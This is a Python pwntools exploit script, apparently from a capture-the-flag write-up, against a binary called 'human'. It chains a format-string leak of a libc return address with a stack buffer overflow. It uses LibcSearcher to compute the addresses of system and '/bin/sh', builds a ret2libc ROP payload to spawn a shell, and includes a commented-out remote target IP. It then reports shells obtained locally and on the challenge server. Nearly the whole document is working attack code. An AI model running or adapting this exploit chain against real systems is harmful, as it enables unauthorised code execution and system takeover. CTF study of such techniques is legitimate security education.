exp (exploit script: format-string leak of a libc address, then a ret2libc stack overflow)
from pwn import *
from LibcSearcher import *
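# --- Stage 1: leak a libc address through the format-string bug -----------
context.log_level = 'debug'
proc = './human'
elf = ELF(proc)            # loaded but not referenced again in this script
p = process(proc)
# p = remote('114.116.54.89', 10005)
p.recv()                   # swallow the banner/prompt (no timeout: blocks if the target prints nothing)

# Stack-slot index that printf's "%N$p" must use to reach the saved return
# address.  On x86-64 the first stack slot is conventionally %6$p (slots 1-5
# are the register arguments), and the return address lies (0x20 + 8) bytes
# above the buffer, i.e. 5 slots further.  This assumes the format-string
# buffer sits at the top of the frame -- check in a debugger if the leaked
# value does not look like a libc text address.
arg = (0x20 + 8) // 8 + 6
payload = '%{}$p'.format(arg).encode()
p.sendline(payload)
# Two lines come back; the second is the "0x..." emitted by %N$p.
# int(..., 16) raises ValueError if that line is not hex, which doubles as
# a cheap sanity check that the offset is right.
libc_start_main_ret = int(p.recvlines(2)[1].decode(), 16)
print(hex(libc_start_main_ret))

# --- Stage 2: resolve libc offsets and build the ret2libc chain ------------
# LibcSearcher may match more than one libc build for a single symbol/offset
# pair; if it prompts, pick the build matching the target, otherwise every
# address computed below is wrong.
libc = LibcSearcher('__libc_start_main_ret', libc_start_main_ret)
libc_base = libc_start_main_ret - libc.dump('__libc_start_main_ret')
pop_rdi_ret = 0x400933     # hard-coded gadget address => assumes the binary is not PIE
system_addr = libc_base + libc.dump('system')
bin_sh_str_addr = libc_base + libc.dump('str_bin_sh')
# Show the derived base (the original printed the raw leak a second time, in decimal).
print(hex(libc_base))

# Overflow: fill the 0x20-byte buffer plus the saved rbp, then
# pop rdi ; ret -> "/bin/sh" -> system.
# NOTE(review): no extra `ret` gadget is placed before system() for 16-byte
# stack alignment; on some glibc builds system() faults (movaps) when rsp is
# misaligned at the call.  If the shell does not spawn, insert a bare `ret`
# gadget in front of pop_rdi_ret.
payload1 = '鸽子真香'.encode().ljust(0x20 + 8, 'a'.encode()) + p64(pop_rdi_ret) + p64(bin_sh_str_addr) + p64(system_addr)
p.sendafter('?\n', payload1)
p.interactive()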
Result: a shell was obtained against the local binary (the original post shows a screenshot here; it is not reproduced in this text).
The same chain, run with the commented-out `remote(...)` line enabled, gave a shell on the challenge server (screenshot in the original post).